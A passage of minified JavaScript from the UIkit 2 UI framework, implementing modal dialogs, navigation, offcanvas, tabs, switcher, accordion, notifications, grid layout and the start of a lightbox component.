i=Math.abs(parseInt(this.dialog.css("margin-top"),10)),e=this.dialog.outerHeight(),n=window.innerHeight,o=n-2*(20>i?20:i)-e;return t.css({maxHeight:o<this.options.minScrollHeight?"":o,height:""}),!0}return!1},_hide:function(){this.active=!1,o>0?o--:o=0,this.element.hide().removeClass("uk-open"),this.element.attr("aria-hidden","true"),o||(s.removeClass("uk-modal-page"),e.css(this.paddingdir,"")),n===this&&(n=!1),this.trigger("hide.uk.modal")},isActive:function(){return this.element.hasClass("uk-open")}}),t.component("modalTrigger",{boot:function(){t.$html.on("click.modal.uikit","[data-uk-modal]",function(i){var e=t.$(this);if(e.is("a")&&i.preventDefault(),!e.data("modalTrigger")){var n=t.modalTrigger(e,t.Utils.options(e.attr("data-uk-modal")));n.show()}}),t.$html.on("keydown.modal.uikit",function(t){n&&27===t.keyCode&&n.options.keyboard&&(t.preventDefault(),n.hide())})},init:function(){var i=this;this.options=t.$.extend({target:i.element.is("a")?i.element.attr("href"):!1},this.options),this.modal=t.modal(this.options.target,this.options),this.on("click",function(t){t.preventDefault(),i.show()}),this.proxy(this.modal,"show hide isActive")}}),t.modal.dialog=function(e,n){var o=t.modal(t.$(t.modal.dialog.template).appendTo("body"),n);return o.on("hide.uk.modal",function(){o.persist&&(o.persist.appendTo(o.persist.data("modalPersistParent")),o.persist=!1),o.element.remove()}),i(e,o),o},t.modal.dialog.template='<div class="uk-modal"><div class="uk-modal-dialog" style="min-height:0;"></div></div>',t.modal.alert=function(i,e){e=t.$.extend(!0,{bgclose:!1,keyboard:!1,modal:!1,labels:t.modal.labels},e);var n=t.modal.dialog(['<div class="uk-margin uk-modal-content">'+String(i)+"</div>",'<div class="uk-modal-footer uk-text-right"><button class="uk-button uk-button-primary uk-modal-close">'+e.labels.Ok+"</button></div>"].join(""),e);return n.on("show.uk.modal",function(){setTimeout(function(){n.element.find("button:first").focus()},50)}),n.show()},t.modal.confirm=function(i,e,n){var o=arguments.length>1&&arguments[arguments.length-1]?arguments[arguments.length-1]:{};e=t.$.isFunction(e)?e:function(){},n=t.$.isFunction(n)?n:function(){},o=t.$.extend(!0,{bgclose:!1,keyboard:!1,modal:!1,labels:t.modal.labels},t.$.isFunction(o)?{}:o);var s=t.modal.dialog(['<div class="uk-margin uk-modal-content">'+String(i)+"</div>",'<div class="uk-modal-footer uk-text-right"><button class="uk-button js-modal-confirm-cancel">'+o.labels.Cancel+'</button> <button class="uk-button uk-button-primary js-modal-confirm">'+o.labels.Ok+"</button></div>"].join(""),o);return s.element.find(".js-modal-confirm, .js-modal-confirm-cancel").on("click",function(){t.$(this).is(".js-modal-confirm")?e():n(),s.hide()}),s.on("show.uk.modal",function(){setTimeout(function(){s.element.find(".js-modal-confirm").focus()},50)}),s.show()},t.modal.prompt=function(i,e,n,o){n=t.$.isFunction(n)?n:function(){},o=t.$.extend(!0,{bgclose:!1,keyboard:!1,modal:!1,labels:t.modal.labels},o);var s=t.modal.dialog([i?'<div class="uk-modal-content uk-form">'+String(i)+"</div>":"",'<div class="uk-margin-small-top uk-modal-content uk-form"><p><input type="text" class="uk-width-1-1"></p></div>','<div class="uk-modal-footer uk-text-right"><button class="uk-button uk-modal-close">'+o.labels.Cancel+'</button> <button class="uk-button uk-button-primary js-modal-ok">'+o.labels.Ok+"</button></div>"].join(""),o),a=s.element.find("input[type='text']").val(e||"").on("keyup",function(t){13==t.keyCode&&s.element.find(".js-modal-ok").trigger("click")});return s.element.find(".js-modal-ok").on("click",function(){n(a.val())!==!1&&s.hide()}),s.show()},t.modal.blockUI=function(i,e){var n=t.modal.dialog(['<div class="uk-margin uk-modal-content">'+String(i||'<div class="uk-text-center">...</div>')+"</div>"].join(""),t.$.extend({bgclose:!1,keyboard:!1,modal:!1},e));return n.content=n.element.find(".uk-modal-content:first"),n.show()},t.modal.labels={Ok:"Ok",Cancel:"Cancel"}}(UIkit2),function(t){"use strict";function i(i){var e=t.$(i),n="auto";if(e.is(":visible"))n=e.outerHeight();else{var o={position:e.css("position"),visibility:e.css("visibility"),display:e.css("display")};n=e.css({position:"absolute",visibility:"hidden",display:"block"}).outerHeight(),e.css(o)}return n}t.component("nav",{defaults:{toggle:'>li.uk-parent > a[href="#"]',lists:">li.uk-parent > ul",multiple:!1},boot:function(){t.ready(function(i){t.$("[data-uk-nav]",i).each(function(){var i=t.$(this);if(!i.data("nav")){t.nav(i,t.Utils.options(i.attr("data-uk-nav")))}})})},init:function(){var i=this;this.on("click.uk.nav",this.options.toggle,function(e){e.preventDefault();var n=t.$(this);i.open(n.parent()[0]==i.element[0]?n:n.parent("li"))}),this.update(),t.domObserve(this.element,function(){i.element.find(i.options.lists).not("[role]").length&&i.update()})},update:function(){var i=this;this.find(this.options.lists).each(function(){var e=t.$(this).attr("role","menu"),n=e.closest("li"),o=n.hasClass("uk-active");n.data("list-container")||(e.wrap('<div style="overflow:hidden;height:0;position:relative;"></div>'),n.data("list-container",e.parent()[o?"removeClass":"addClass"]("uk-hidden"))),n.attr("aria-expanded",n.hasClass("uk-open")),o&&i.open(n,!0)})},open:function(e,n){var o=this,s=this.element,a=t.$(e),r=a.data("list-container");this.options.multiple||s.children(".uk-open").not(e).each(function(){var i=t.$(this);i.data("list-container")&&i.data("list-container").stop().animate({height:0},function(){t.$(this).parent().removeClass("uk-open").end().addClass("uk-hidden")})}),a.toggleClass("uk-open"),a.attr("aria-expanded",a.hasClass("uk-open")),r&&(a.hasClass("uk-open")&&r.removeClass("uk-hidden"),n?(r.stop().height(a.hasClass("uk-open")?"auto":0),a.hasClass("uk-open")||r.addClass("uk-hidden"),this.trigger("display.uk.check")):r.stop().animate({height:a.hasClass("uk-open")?i(r.find("ul:first")):0},function(){a.hasClass("uk-open")?r.css("height",""):r.addClass("uk-hidden"),o.trigger("display.uk.check")}))}})}(UIkit2),function(t){"use strict";var i={x:window.scrollX,y:window.scrollY},e=(t.$win,t.$doc,t.$html),n={show:function(n,o){if(n=t.$(n),n.length){o=t.$.extend({mode:"push"},o);var s=t.$("body"),a=n.find(".uk-offcanvas-bar:first"),r="right"==t.langdirection,l=a.hasClass("uk-offcanvas-bar-flip")?-1:1,c=l*(r?-1:1),u=window.innerWidth-s.width();i={x:window.pageXOffset,y:window.pageYOffset},a.attr("mode",o.mode),n.addClass("uk-active"),s.css({width:window.innerWidth-u,height:window.innerHeight}).addClass("uk-offcanvas-page"),("push"==o.mode||"reveal"==o.mode)&&s.css(r?"margin-right":"margin-left",(r?-1:1)*a.outerWidth()*c),"reveal"==o.mode&&a.css("clip","rect(0, "+a.outerWidth()+"px, 100vh, 0)"),e.css("margin-top",-1*i.y).width(),a.addClass("uk-offcanvas-bar-show"),this._initElement(n),a.trigger("show.uk.offcanvas",[n,a]),n.attr("aria-hidden","false")}},hide:function(n){var o=t.$("body"),s=t.$(".uk-offcanvas.uk-active"),a="right"==t.langdirection,r=s.find(".uk-offcanvas-bar:first"),l=function(){o.removeClass("uk-offcanvas-page").css({width:"",height:"",marginLeft:"",marginRight:""}),s.removeClass("uk-active"),r.removeClass("uk-offcanvas-bar-show"),e.css("margin-top",""),window.scrollTo(i.x,i.y),r.trigger("hide.uk.offcanvas",[s,r]),s.attr("aria-hidden","true")};s.length&&("none"==r.attr("mode")&&(n=!0),t.support.transition&&!n?(o.one(t.support.transition.end,function(){l()}).css(a?"margin-right":"margin-left",""),"reveal"==r.attr("mode")&&r.css("clip",""),setTimeout(function(){r.removeClass("uk-offcanvas-bar-show")},0)):l())},_initElement:function(i){i.data("OffcanvasInit")||(i.on("click.uk.offcanvas swipeRight.uk.offcanvas swipeLeft.uk.offcanvas",function(i){var e=t.$(i.target);if(!i.type.match(/swipe/)&&!e.hasClass("uk-offcanvas-close")){if(e.hasClass("uk-offcanvas-bar"))return;if(e.parents(".uk-offcanvas-bar:first").length)return}i.stopImmediatePropagation(),n.hide()}),i.on("click",'a[href*="#"]',function(){var i=t.$(this),e=i.attr("href");"#"!=e&&(t.$doc.one("hide.uk.offcanvas",function(){var n;try{n=t.$(i[0].hash)}catch(o){n=""}n.length||(n=t.$('[name="'+i[0].hash.replace("#","")+'"]')),n.length&&t.Utils.scrollToElement?t.Utils.scrollToElement(n,t.Utils.options(i.attr("data-uk-smooth-scroll")||"{}")):window.location.href=e}),n.hide())}),i.data("OffcanvasInit",!0))}};t.component("offcanvasTrigger",{boot:function(){e.on("click.offcanvas.uikit","[data-uk-offcanvas]",function(i){i.preventDefault();var e=t.$(this);if(!e.data("offcanvasTrigger")){{t.offcanvasTrigger(e,t.Utils.options(e.attr("data-uk-offcanvas")))}e.trigger("click")}}),e.on("keydown.uk.offcanvas",function(t){27===t.keyCode&&n.hide()})},init:function(){var i=this;this.options=t.$.extend({target:i.element.is("a")?i.element.attr("href"):!1,mode:"push"},this.options),this.on("click",function(t){t.preventDefault(),n.show(i.options.target,i.options)})}}),t.offcanvas=n}(UIkit2),function(t){"use strict";function i(i,e,n){var o,s=t.$.Deferred(),a=i,r=i;return n[0]===e[0]?(s.resolve(),s.promise()):("object"==typeof i&&(a=i[0],r=i[1]||i[0]),t.$body.css("overflow-x","hidden"),o=function(){e&&e.hide().removeClass("uk-active "+r+" uk-animation-reverse"),n.addClass(a).one(t.support.animation.end,function(){setTimeout(function(){n.removeClass(""+a).css({opacity:"",display:""})},0),s.resolve(),t.$body.css("overflow-x",""),e&&e.css({opacity:"",display:""})}.bind(this)).show()},n.css("animation-duration",this.options.duration+"ms"),e&&e.length?(e.css("animation-duration",this.options.duration+"ms"),e.css("display","none").addClass(r+" uk-animation-reverse").one(t.support.animation.end,function(){o()}.bind(this)).css("display","")):(n.addClass("uk-active"),o()),s.promise())}var e;t.component("switcher",{defaults:{connect:!1,toggle:">*",active:0,animation:!1,duration:200,swiping:!0},animating:!1,boot:function(){t.ready(function(i){t.$("[data-uk-switcher]",i).each(function(){var i=t.$(this);if(!i.data("switcher")){t.switcher(i,t.Utils.options(i.attr("data-uk-switcher")))}})})},init:function(){var i=this;this.on("click.uk.switcher",this.options.toggle,function(t){t.preventDefault(),i.show(this)}),this.options.connect&&(this.connect=t.$(this.options.connect),this.connect.length&&(this.connect.on("click.uk.switcher","[data-uk-switcher-item]",function(e){e.preventDefault();var n=t.$(this).attr("data-uk-switcher-item");if(i.index!=n)switch(n){case"next":case"previous":i.show(i.index+("next"==n?1:-1));break;default:i.show(parseInt(n,10))}}),this.options.swiping&&this.connect.on("swipeRight swipeLeft",function(t){t.preventDefault(),window.getSelection().toString()||i.show(i.index+("swipeLeft"==t.type?1:-1))}),this.update()))},update:function(){this.connect.children().removeClass("uk-active").attr("aria-hidden","true");var t=this.find(this.options.toggle),i=t.filter(".uk-active");if(i.length)this.show(i,!1);else{if(this.options.active===!1)return;i=t.eq(this.options.active),this.show(i.length?i:t.eq(0),!1)}t.not(i).attr("aria-expanded","false"),i.attr("aria-expanded","true")},show:function(n,o){if(!this.animating){var s=this.find(this.options.toggle);isNaN(n)?n=t.$(n):(n=0>n?s.length-1:n,n=s.eq(s[n]?n:0));var a=this,r=t.$(n),l=e[this.options.animation]||function(t,n){if(!a.options.animation)return e.none.apply(a);var o=a.options.animation.split(",");return 1==o.length&&(o[1]=o[0]),o[0]=o[0].trim(),o[1]=o[1].trim(),i.apply(a,[o,t,n])};o!==!1&&t.support.animation||(l=e.none),r.hasClass("uk-disabled")||(s.attr("aria-expanded","false"),r.attr("aria-expanded","true"),s.filter(".uk-active").removeClass("uk-active"),r.addClass("uk-active"),this.options.connect&&this.connect.length&&(this.index=this.find(this.options.toggle).index(r),-1==this.index&&(this.index=0),this.connect.each(function(){var i=t.$(this),e=t.$(i.children()),n=t.$(e.filter(".uk-active")),o=t.$(e.eq(a.index));a.animating=!0,l.apply(a,[n,o]).then(function(){n.removeClass("uk-active"),o.addClass("uk-active"),n.attr("aria-hidden","true"),o.attr("aria-hidden","false"),t.Utils.checkDisplay(o,!0),a.animating=!1})})),this.trigger("show.uk.switcher",[r]))}}}),e={none:function(){var i=t.$.Deferred();return i.resolve(),i.promise()},fade:function(t,e){return i.apply(this,["uk-animation-fade",t,e])},"slide-bottom":function(t,e){return i.apply(this,["uk-animation-slide-bottom",t,e])},"slide-top":function(t,e){return i.apply(this,["uk-animation-slide-top",t,e])},"slide-vertical":function(t,e){var n=["uk-animation-slide-top","uk-animation-slide-bottom"];return t&&t.index()>e.index()&&n.reverse(),i.apply(this,[n,t,e])},"slide-left":function(t,e){return i.apply(this,["uk-animation-slide-left",t,e])},"slide-right":function(t,e){return i.apply(this,["uk-animation-slide-right",t,e])},"slide-horizontal":function(t,e){var n=["uk-animation-slide-right","uk-animation-slide-left"];return t&&t.index()>e.index()&&n.reverse(),i.apply(this,[n,t,e])},scale:function(t,e){return i.apply(this,["uk-animation-scale-up",t,e])}},t.switcher.animations=e}(UIkit2),function(t){"use strict";t.component("tab",{defaults:{target:">li:not(.uk-tab-responsive, .uk-disabled)",connect:!1,active:0,animation:!1,duration:200,swiping:!0},boot:function(){t.ready(function(i){t.$("[data-uk-tab]",i).each(function(){var i=t.$(this);if(!i.data("tab")){t.tab(i,t.Utils.options(i.attr("data-uk-tab")))}})})},init:function(){var i=this;this.current=!1,this.on("click.uk.tab",this.options.target,function(e){if(e.preventDefault(),!i.switcher||!i.switcher.animating){var n=i.find(i.options.target).not(this);n.removeClass("uk-active").blur(),i.trigger("change.uk.tab",[t.$(this).addClass("uk-active"),i.current]),i.current=t.$(this),i.options.connect||(n.attr("aria-expanded","false"),t.$(this).attr("aria-expanded","true"))}}),this.options.connect&&(this.connect=t.$(this.options.connect)),this.responsivetab=t.$('<li class="uk-tab-responsive uk-active"><a></a></li>').append('<div class="uk-dropdown uk-dropdown-small"><ul class="uk-nav uk-nav-dropdown"></ul><div>'),this.responsivetab.dropdown=this.responsivetab.find(".uk-dropdown"),this.responsivetab.lst=this.responsivetab.dropdown.find("ul"),this.responsivetab.caption=this.responsivetab.find("a:first"),this.element.hasClass("uk-tab-bottom")&&this.responsivetab.dropdown.addClass("uk-dropdown-up"),this.responsivetab.lst.on("click.uk.tab","a",function(e){e.preventDefault(),e.stopPropagation();var n=t.$(this);i.element.children("li:not(.uk-tab-responsive)").eq(n.data("index")).trigger("click")}),this.on("show.uk.switcher change.uk.tab",function(t,e){i.responsivetab.caption.html(e.text())}),this.element.append(this.responsivetab),this.options.connect&&(this.switcher=t.switcher(this.element,{toggle:">li:not(.uk-tab-responsive)",connect:this.options.connect,active:this.options.active,animation:this.options.animation,duration:this.options.duration,swiping:this.options.swiping})),t.dropdown(this.responsivetab,{mode:"click",preventflip:"y"}),i.trigger("change.uk.tab",[this.element.find(this.options.target).not(".uk-tab-responsive").filter(".uk-active")]),this.check(),t.$win.on("resize orientationchange",t.Utils.debounce(function(){i.element.is(":visible")&&i.check()},100)),this.on("display.uk.check",function(){i.element.is(":visible")&&i.check()})},check:function(){var i=this.element.children("li:not(.uk-tab-responsive)").removeClass("uk-hidden");if(!i.length)return this.responsivetab.addClass("uk-hidden"),void 0;var e,n,o,s=i.eq(0).offset().top+Math.ceil(i.eq(0).height()/2),a=!1;if(this.responsivetab.lst.empty(),i.each(function(){t.$(this).offset().top>s&&(a=!0)}),a)for(var r=0;r<i.length;r++)e=t.$(i.eq(r)),n=e.find("a"),"none"==e.css("float")||e.attr("uk-dropdown")||(e.hasClass("uk-disabled")||(o=t.$(e[0].outerHTML),o.find("a").data("index",r),this.responsivetab.lst.append(o)),e.addClass("uk-hidden"));this.responsivetab[this.responsivetab.lst.children("li").length?"removeClass":"addClass"]("uk-hidden")}})}(UIkit2),function(t){"use strict";t.component("cover",{defaults:{automute:!0},boot:function(){t.ready(function(i){t.$("[data-uk-cover]",i).each(function(){var i=t.$(this);if(!i.data("cover")){t.cover(i,t.Utils.options(i.attr("data-uk-cover")))}})})},init:function(){if(this.parent=this.element.parent(),t.$win.on("load resize orientationchange",t.Utils.debounce(function(){this.check()}.bind(this),100)),this.on("display.uk.check",function(){this.element.is(":visible")&&this.check()}.bind(this)),this.check(),this.element.is("iframe")&&this.options.automute){var i=this.element.attr("src");this.element.attr("src","").on("load",function(){this.contentWindow.postMessage('{ "event": "command", "func": "mute", "method":"setVolume", "value":0}',"*")}).attr("src",[i,i.indexOf("?")>-1?"&":"?","enablejsapi=1&api=1"].join(""))}},check:function(){this.element.css({width:"",height:""}),this.dimension={w:this.element.width(),h:this.element.height()},this.element.attr("width")&&!isNaN(this.element.attr("width"))&&(this.dimension.w=this.element.attr("width")),this.element.attr("height")&&!isNaN(this.element.attr("height"))&&(this.dimension.h=this.element.attr("height")),this.ratio=this.dimension.w/this.dimension.h;var t,i,e=this.parent.width(),n=this.parent.height();e/this.ratio<n?(t=Math.ceil(n*this.ratio),i=n):(t=e,i=Math.ceil(e/this.ratio)),this.element.css({width:t,height:i})}})}(UIkit2);

/*! Accordion */
!function(t){var i;window.UIkit2&&(i=t(UIkit2)),"function"==typeof define&&define.amd&&define("uikit-accordion",["uikit"],function(){return i||t(UIkit2)})}(function(t){"use strict";function i(i){var e=t.$(i),o="auto";if(e.is(":visible"))o=e.outerHeight();else{var a={position:e.css("position"),visibility:e.css("visibility"),display:e.css("display")};o=e.css({position:"absolute",visibility:"hidden",display:"block"}).outerHeight(),e.css(a)}return o}return t.component("accordion",{defaults:{showfirst:!0,collapse:!0,animate:!0,easing:"swing",duration:300,toggle:".uk-accordion-title",containers:".uk-accordion-content",clsactive:"uk-active"},boot:function(){t.ready(function(i){setTimeout(function(){t.$("[data-uk-accordion]",i).each(function(){var i=t.$(this);i.data("accordion")||t.accordion(i,t.Utils.options(i.attr("data-uk-accordion")))})},0)})},init:function(){var i=this;this.element.on("click.uk.accordion",this.options.toggle,function(e){e.preventDefault(),i.toggleItem(t.$(this).data("wrapper"),i.options.animate,i.options.collapse)}),this.update(!0),t.domObserve(this.element,function(){i.element.children(i.options.containers).length&&i.update()})},toggleItem:function(e,o,a){var n=this;e.data("toggle").toggleClass(this.options.clsactive),e.data("content").toggleClass(this.options.clsactive);var s=e.data("toggle").hasClass(this.options.clsactive);a&&(this.toggle.not(e.data("toggle")).removeClass(this.options.clsactive),this.content.not(e.data("content")).removeClass(this.options.clsactive).parent().stop().css("overflow","hidden").animate({height:0},{easing:this.options.easing,duration:o?this.options.duration:0}).attr("aria-expanded","false")),e.stop().css("overflow","hidden"),o?e.animate({height:s?i(e.data("content")):0},{easing:this.options.easing,duration:this.options.duration,complete:function(){s&&(e.css({overflow:"",height:"auto"}),t.Utils.checkDisplay(e.data("content"))),n.trigger("display.uk.check")}}):(e.height(s?"auto":0),s&&(e.css({overflow:""}),t.Utils.checkDisplay(e.data("content"))),this.trigger("display.uk.check")),e.attr("aria-expanded",s),this.element.trigger("toggle.uk.accordion",[s,e.data("toggle"),e.data("content")])},update:function(i){var e,o,a,n=this;this.toggle=this.find(this.options.toggle),this.content=this.find(this.options.containers),this.content.each(function(i){e=t.$(this),e.parent().data("wrapper")?o=e.parent():(o=t.$(this).wrap('<div data-wrapper="true" style="overflow:hidden;height:0;position:relative;"></div>').parent(),o.attr("aria-expanded","false")),a=n.toggle.eq(i),o.data("toggle",a),o.data("content",e),a.data("wrapper",o),e.data("wrapper",o)}),this.element.trigger("update.uk.accordion",[this]),i&&this.options.showfirst&&this.toggleItem(this.toggle.eq(0).data("wrapper"),!1,!1)}}),t.accordion});

/*! Notify */
!function(t){var e;window.UIkit2&&(e=t(UIkit2)),"function"==typeof define&&define.amd&&define("uikit-notify",["uikit"],function(){return e||t(UIkit2)})}(function(t){"use strict";var e={},i={},s=function(e){return"string"==t.$.type(e)&&(e={message:e}),arguments[1]&&(e=t.$.extend(e,"string"==t.$.type(arguments[1])?{status:arguments[1]}:arguments[1])),new n(e).show()},o=function(t,e){var s;if(t)for(s in i)t===i[s].group&&i[s].close(e);else for(s in i)i[s].close(e)},n=function(s){this.options=t.$.extend({},n.defaults,s),this.uuid=t.Utils.uid("notifymsg"),this.element=t.$(['<div class="uk-notify-message">','<a class="uk-close"></a>',"<div></div>","</div>"].join("")).data("notifyMessage",this),this.content(this.options.message),this.options.status&&(this.element.addClass("uk-notify-message-"+this.options.status),this.currentstatus=this.options.status),this.group=this.options.group,i[this.uuid]=this,e[this.options.pos]||(e[this.options.pos]=t.$('<div class="uk-notify uk-notify-'+this.options.pos+'"></div>').appendTo("body").on("click",".uk-notify-message",function(){var e=t.$(this).data("notifyMessage");e.element.trigger("manualclose.uk.notify",[e]),e.close()}))};return t.$.extend(n.prototype,{uuid:!1,element:!1,timout:!1,currentstatus:"",group:!1,show:function(){if(!this.element.is(":visible")){var t=this;e[this.options.pos].show().prepend(this.element);var i=parseInt(this.element.css("margin-bottom"),10);return this.element.css({opacity:0,marginTop:-1*this.element.outerHeight(),marginBottom:0}).animate({opacity:1,marginTop:0,marginBottom:i},function(){if(t.options.timeout){var e=function(){t.close()};t.timeout=setTimeout(e,t.options.timeout),t.element.hover(function(){clearTimeout(t.timeout)},function(){t.timeout=setTimeout(e,t.options.timeout)})}}),this}},close:function(t){var s=this,o=function(){s.element.remove(),e[s.options.pos].children().length||e[s.options.pos].hide(),s.options.onClose.apply(s,[]),s.element.trigger("close.uk.notify",[s]),delete i[s.uuid]};this.timeout&&clearTimeout(this.timeout),t?o():this.element.animate({opacity:0,marginTop:-1*this.element.outerHeight(),marginBottom:0},function(){o()})},content:function(t){var e=this.element.find(">div");return t?(e.html(t),this):e.html()},status:function(t){return t?(this.element.removeClass("uk-notify-message-"+this.currentstatus).addClass("uk-notify-message-"+t),this.currentstatus=t,this):this.currentstatus}}),n.defaults={message:"",status:"",timeout:5e3,group:null,pos:"top-center",onClose:function(){}},t.notify=s,t.notify.message=n,t.notify.closeAll=o,s});

/*! Grid */
!function(t){var i;window.UIkit2&&(i=t(UIkit2)),"function"==typeof define&&define.amd&&define("uikit-grid",["uikit"],function(){return i||t(UIkit2)})}(function(t){"use strict";function i(){function t(t){if(t){if("string"==typeof u[t])return t;t=t.charAt(0).toUpperCase()+t.slice(1);for(var i,e=0,n=h.length;n>e;e++)if(i=h[e]+t,"string"==typeof u[i])return i}}function i(t){var i=parseFloat(t),e=-1===t.indexOf("%")&&!isNaN(i);return e&&i}function e(){}function n(){for(var t={width:0,height:0,innerWidth:0,innerHeight:0,outerWidth:0,outerHeight:0},i=0,e=c.length;e>i;i++){var n=c[i];t[n]=0}return t}function r(){if(!f){f=!0;var e=window.getComputedStyle;if(s=function(){var t=e?function(t){return e(t,null)}:function(t){return t.currentStyle};return function(i){var e=t(i);return e||l("Style returned "+e+". Are you running this code in a hidden iframe on Firefox? See http://bit.ly/getsizebug1"),e}}(),a=t("boxSizing")){var n=document.createElement("div");n.style.width="200px",n.style.padding="1px 2px 3px 4px",n.style.borderStyle="solid",n.style.borderWidth="1px 2px 3px 4px",n.style[a]="border-box";var r=document.body||document.documentElement;r.appendChild(n);var o=s(n);d=200===i(o.width),r.removeChild(n)}}}function o(t){if(r(),"string"==typeof t&&(t=document.querySelector(t)),t&&"object"==typeof t&&t.nodeType){var e=s(t);if("none"===e.display)return n();var o={};o.width=t.offsetWidth,o.height=t.offsetHeight;for(var h=o.isBorderBox=!(!a||!e[a]||"border-box"!==e[a]),u=0,l=c.length;l>u;u++){var f=c[u],p=e[f],g=parseFloat(p);o[f]=isNaN(g)?0:g}var m=o.paddingLeft+o.paddingRight,v=o.paddingTop+o.paddingBottom,b=o.marginLeft+o.marginRight,y=o.marginTop+o.marginBottom,k=o.borderLeftWidth+o.borderRightWidth,w=o.borderTopWidth+o.borderBottomWidth,x=h&&d,W=i(e.width);W!==!1&&(o.width=W+(x?0:m+k));var $=i(e.height);return $!==!1&&(o.height=$+(x?0:v+w)),o.innerWidth=o.width-(m+k),o.innerHeight=o.height-(v+w),o.outerWidth=o.width+b,o.outerHeight=o.height+y,o}}var s,a,d,h="Webkit Moz ms Ms O".split(" "),u=document.documentElement.style,l="undefined"==typeof console?e:function(t){console.error(t)},c=["paddingLeft","paddingRight","paddingTop","paddingBottom","marginLeft","marginRight","marginTop","marginBottom","borderLeftWidth","borderRightWidth","borderTopWidth","borderBottomWidth"],f=!1;return o}function e(t){return i()(t)}t.component("grid",{defaults:{colwidth:"auto",animation:!0,duration:300,gutter:0,controls:!1,filter:!1,origin:t.langdirection},boot:function(){t.ready(function(i){t.$("[data-uk-grid]",i).each(function(){var i=t.$(this);i.data("grid")||t.grid(i,t.Utils.options(i.attr("data-uk-grid")))})})},init:function(){var i=this,e=String(this.options.gutter).trim().split(" ");this.gutterv=parseInt(e[0],10),this.gutterh=parseInt(e[1]||e[0],10),this.element.css({position:"relative"}),this.controls=null,this.origin=this.options.origin,this.options.controls&&(this.controls=t.$(this.options.controls),this.controls.on("click","[data-uk-filter]",function(e){e.preventDefault(),i.filter(t.$(this).attr("data-uk-filter"))}),this.controls.on("click","[data-uk-sort]",function(e){e.preventDefault();var n=t.$(this).attr("data-uk-sort").split(":");i.sort(n[0],n[1])})),t.$win.on("load resize orientationchange",t.Utils.debounce(function(){i.currentfilter?i.filter(i.currentfilter):this.update()}.bind(this),100)),this.on("display.uk.check",function(){i.element.is(":visible")&&i.update()}),t.domObserve(this.element,function(){i.update()}),this.options.filter!==!1?this.filter(this.options.filter):this.update()},_prepareElements:function(){var t,i=this.element.children(":not([data-grid-prepared])");i.length&&(t={position:"absolute",boxSizing:"border-box",width:"auto"==this.options.colwidth?"":this.options.colwidth},this.options.gutter&&(t["padding-"+this.origin]=this.gutterh,t["padding-bottom"]=this.gutterv,this.element.css("margin-"+this.origin,-1*this.gutterh)),i.attr("data-grid-prepared","true").css(t))},update:function(i){var n=this;this._prepareElements(),i=i||this.element.children(":visible");var r,o,s,a,d,h,u,l,c,f=i,p=this.element.width()+2*this.gutterh+2,g=0,m=0,v=[];this.trigger("beforeupdate.uk.grid",[f]),f.each(function(){for(c=e(this),r=t.$(this),o=c.outerWidth,s=c.outerHeight,g=0,m=0,h=0,l=v.length;l>h;h++)a=v[h],g<=a.aX&&(g=a.aX),g+o>p&&(g=0),m<=a.aY&&(m=a.aY);d={ele:r,top:m,width:o,height:s,aY:m+s,aX:g+o},d[n.origin]=g,v.push(d)});var b,y,k=0;for(h=0,l=v.length;l>h;h++){for(a=v[h],m=0,u=0;h>u;u++)b=v[u],a[this.origin]<b.aX&&b[this.origin]+1<a.aX&&(m=b.aY);a.top=m,a.aY=m+a.height,k=Math.max(k,a.aY)}k-=this.gutterv,this.options.animation?(this.element.stop().animate({height:k},100),v.forEach(function(t){y={top:t.top,opacity:1},y[n.origin]=t[n.origin],t.ele.stop().animate(y,this.options.duration)}.bind(this))):(this.element.css("height",k),v.forEach(function(t){y={top:t.top,opacity:1},y[n.origin]=t[n.origin],t.ele.css(y)}.bind(this))),setTimeout(function(){t.$doc.trigger("scrolling.uk.document")},2*this.options.duration*(this.options.animation?1:0)),this.trigger("afterupdate.uk.grid",[f])},filter:function(i){this.currentfilter=i,i=i||[],"number"==typeof i&&(i=i.toString()),"string"==typeof i&&(i=i.split(/,/).map(function(t){return t.trim()}));var e=this,n=this.element.children(),r={visible:[],hidden:[]};n.each(function(){var e=t.$(this),n=e.attr("data-uk-filter"),o=i.length?!1:!0;n&&(n=n.split(/,/).map(function(t){return t.trim()}),i.forEach(function(t){n.indexOf(t)>-1&&(o=!0)})),r[o?"visible":"hidden"].push(e)}),r.hidden=t.$(r.hidden).map(function(){return this[0]}),r.visible=t.$(r.visible).map(function(){return this[0]}),r.hidden.attr("aria-hidden","true").filter(":visible").fadeOut(this.options.duration),r.visible.attr("aria-hidden","false").filter(":hidden").css("opacity",0).show(),e.update(r.visible),this.controls&&this.controls.length&&this.controls.find("[data-uk-filter]").removeClass("uk-active").filter('[data-uk-filter="'+i+'"]').addClass("uk-active")},sort:function(i,e){e=e||1,"string"==typeof e&&(e="desc"==e.toLowerCase()?-1:1);var n=this.element.children();n.sort(function(n,r){return n=t.$(n),r=t.$(r),(r.data(i)||"")<(n.data(i)||"")?e:-1*e}).appendTo(this.element),this.update(n.filter(":visible")),this.controls&&this.controls.length&&this.controls.find("[data-uk-sort]").removeClass("uk-active").filter('[data-uk-sort="'+i+":"+(-1==e?"desc":"asc")+'"]').addClass("uk-active")}})});

/*! Lightbox */
!function(i){var t;window.UIkit2&&(t=i(UIkit2)),"function"==typeof define&&define.amd&&define("uikit-lightbox",["uikit"],function(){return t||i(UIkit2)})}(function(i){"use strict";function t(t){if(e)return e.lightbox=t,e;e=i.$(['<div class="uk-modal">','<div class="uk-modal-dialog uk-modal-dialog-lightbox uk-slidenav-position" style="margin-left:auto;margin-right:auto;width:200px;height:200px;top:'+Math.abs(window.innerHeight/2-200)+'px;">','<a href="#" class="uk-modal-close uk-close uk-close-alt"></a>','<div class="uk-lightbox-content"></div>','<div class="uk-modal-spinner uk-hidden"></div>',"</div>","</div>"].join("")).appendTo("body"),e.dialog=e.find(".uk-modal-dialog:first"),e.content=e.find(".uk-lightbox-content:first"),e.loader=e.find(".uk-modal-spinner:first"),e.closer=e.find(".uk-close.uk-close-alt"),e.modal=i.modal(e,{modal:!1}),e.on("swipeRight swipeLeft",function(i){e.lightbox["swipeLeft"==i.type?"next":"previous"]()}).on("click","[data-lightbox-previous], [data-lightbox-next]",function(t){t.preventDefault(),e.lightbox[i.$(this).is("[data-lightbox-next]")?"next":"previous"]()}),e.on("hide.uk.modal",function(){e.content.html("")});var o={w:window.innerWidth,h:window.innerHeight};return i.$win.on("load resize orientationchange",i.Utils.debounce(function(){o.w!==window.innerWidth&&e.is(":visible")&&!i.Utils.isFullscreen()&&e.lightbox.fitSize(),o={w:window.innerWidth,h:window.innerHeight}},100)),e.lightbox=t,e}var e,o={};return 